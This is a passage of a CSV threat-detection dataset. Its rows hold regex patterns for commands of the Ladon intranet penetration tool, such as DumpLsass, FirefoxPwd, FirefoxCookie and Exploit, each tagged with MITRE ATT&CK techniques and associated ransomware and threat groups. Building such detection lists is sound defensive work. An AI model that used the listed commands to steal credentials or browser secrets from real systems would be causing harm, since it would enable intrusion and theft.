- Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50716" "*Ladon CVE-*",".{0,1000}Ladon\sCVE\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50717" "*Ladon DirList*",".{0,1000}Ladon\sDirList.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50718" "*Ladon DraytekExp*",".{0,1000}Ladon\sDraytekExp.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50719" "*Ladon DumpLsass*",".{0,1000}Ladon\sDumpLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50720" "*Ladon EnableDotNet*",".{0,1000}Ladon\sEnableDotNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50721" "*Ladon EnumProcess*",".{0,1000}Ladon\sEnumProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50722" "*Ladon EnumShare*",".{0,1000}Ladon\sEnumShare.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50723" "*Ladon Exploit*",".{0,1000}Ladon\sExploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50724" "*Ladon FindIP *",".{0,1000}Ladon\sFindIP\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50725" "*Ladon FirefoxCookie*",".{0,1000}Ladon\sFirefoxCookie.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50726" "*Ladon FirefoxHistory*",".{0,1000}Ladon\sFirefoxHistory.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50727" "*Ladon FirefoxPwd*",".{0,1000}Ladon\sFirefoxPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50728" "*Ladon ForExec *",".{0,1000}Ladon\sForExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50729" "*Ladon FtpDownLoad *",".{0,1000}Ladon\sFtpDownLoad\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50730" "*Ladon FtpServer *",".{0,1000}Ladon\sFtpServer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - 